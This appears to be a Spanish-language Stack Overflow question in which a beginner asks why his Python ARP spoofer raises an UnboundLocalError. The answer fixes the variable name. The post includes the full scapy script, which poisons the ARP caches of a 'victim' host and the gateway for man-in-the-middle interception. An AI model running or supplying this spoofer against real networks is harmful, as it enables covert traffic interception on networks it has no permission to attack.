# ¿Cómo soluciono el siguiente error? UnboundLocalError: local variable 'destination_mac' referenced before assignment

Tags: python-3.x

Estoy creando un ***arp_spoofer***; está prácticamente terminado, nomás me falta solucionar el error que me está dando (soy nuevo en python, uso python y visual studio code):

```
1Ingrese el ip de la victima:192.168.226.30
ingrese el gateway: 192.168.226.148
[+] Packets sent: 6^C
[+] Dectectado CTRL + C ...limpiando tablas ARP ... Cerrando ARP Spoofer
Traceback (most recent call last):
  File "/home/kali/Documents/arp_spoofer.py", line 37, in <module>
    time.sleep(2)
KeyboardInterrupt
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/home/kali/Documents/arp_spoofer.py", line 40, in <module>
    restore (target_ip, gateway_ip)
  File "/home/kali/Documents/arp_spoofer.py", line 21, in restore
    destination_mac = get_mac(destination_mac)
UnboundLocalError: local variable 'destination_mac' referenced before assignment
```

Por acá les dejo mi código:

```
    from tabnanny import verbose
    import scapy.all as scapy
    import time

    def get_mac(ip):
        arp_request = scapy.ARP(pdst=ip)
        broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
        arp_request_broadcast = broadcast/arp_request
        answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
        
        return answered_list[0][1].hwsrc

    def spoof(target_ip, spoof_ip):
        target_mac = get_mac(target_ip)
        packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
        scapy.send(packet, verbose = False)

    def restore(destination_ip, source_ip):
        destination_mac = get_mac(destination_mac)
        source_mac = get_mac(source_ip)
        packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
        scapy.send(packet, count=4, verbose=False)

    target_ip = input("Ingrese el ip de la victima: ")
    gateway_ip = input("ingrese el gateway: ")

    sent_packet_count = 0
    try:
        while True:
            spoof(target_ip,gateway_ip)
            spoof(gateway_ip,target_ip)
            sent_packet_count =  sent_packet_count + 2
            print("\r[+] Packets sent: " + str(sent_packet_count), end = "")
            time.sleep(2)

    except KeyboardInterrupt:
        print("\n[+] Dectectado CTRL + C ...limpiando tablas ARP ... Cerrando ARP Spoofer")
        restore (target_ip, gateway_ip)
        restore(gateway_ip, target_ip)
```

Answer (score 0, accepted):

El error lo tienes ahí `destination_mac = get_mac(destination_mac)`

Y te dice que estás intentando obtener su valor con get_mac antes de haberle asignado nada.

Tendrás que cambiar el nombre de la variable y modificarlo en las otras líneas donde lo utilices.

Creo que esa línea tendría que ser `destination_mac = get_mac(destination_ip)`

Comment: Muchas gracias @Visent, ya lo arreglé.☻

Comment: Hola @Visent podrías ayudarme en esta pregunta [link](https://es.stackoverflow.com/questions/561530/como-soluciono-el-siguiente-error)